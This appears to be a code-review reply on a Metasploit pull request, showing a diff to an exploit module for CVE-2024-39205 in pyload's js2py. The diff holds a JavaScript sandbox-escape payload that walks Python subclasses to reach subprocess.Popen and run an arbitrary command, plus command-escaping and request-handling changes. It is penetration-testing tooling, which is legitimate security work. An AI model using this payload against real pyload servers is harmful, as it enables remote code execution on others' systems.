Responded to comments

Author: jheysel-r7

modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb

@@ -126,10 +126,10 @@ def javascript_payload(cmd)
       #{js_vars[:obj]} = #{js_vars[:n11]}("__class__").__base__
       #{js_vars[:getattr]} = #{js_vars[:obj]}.__getattribute__
 
-      function #{js_vars[:findpopen]}(o) {
+      function #{js_vars[:findpopen]}(#{js_vars[:o]}) {
           let #{js_vars[:result]};
-          for(let i in o.__subclasses__()) {
-              let #{js_vars[:item]} = o.__subclasses__()[i]
+          for(let #{js_vars[:i]} in #{js_vars[:o]}.__subclasses__()) {
+              let #{js_vars[:item]} = #{js_vars[:o]}.__subclasses__()[#{js_vars[:i]}]
               if(#{js_vars[:item]}.__module__ == "subprocess" && #{js_vars[:item]}.__name__ == "Popen") {
                   return #{js_vars[:item]}
               }
@@ -140,14 +140,12 @@ def javascript_payload(cmd)
       }
 
       #{js_vars[:n11]} = #{js_vars[:findpopen]}(#{js_vars[:obj]})(#{js_vars[:command]}, -1, null, -1, -1, -1, null, null, true).communicate()
-      console.log(#{js_vars[:n11]})
-      function f() {
-          return #{js_vars[:n11]}
-      }
     EOS
   end
 
   def execute_command(cmd, _opts = {})
+    cmd.gsub!(/\\/, '\\\\\\\\')
+    cmd.gsub!(/"/, '\"')
     vprint_status("Executing command: #{cmd}")
     crypted_b64 = Rex::Text.encode_base64(rand(4))
 
@@ -165,9 +163,7 @@ def execute_command(cmd, _opts = {})
 
     # The command will either cause the response to timeout or return a 500
     return if res.nil?
-    return if res.code == 500 && res.body =~ /Could not decrypt key/
-
-    print_status(javascript_payload(cmd))
+    return if res.code == 500 && res.get_xml_document.xpath('//title').text == 'Sorry, something went wrong... :('
 
     fail_with(Failure::UnexpectedReply, "The HTTP server replied with a status of #{res.code}")
   end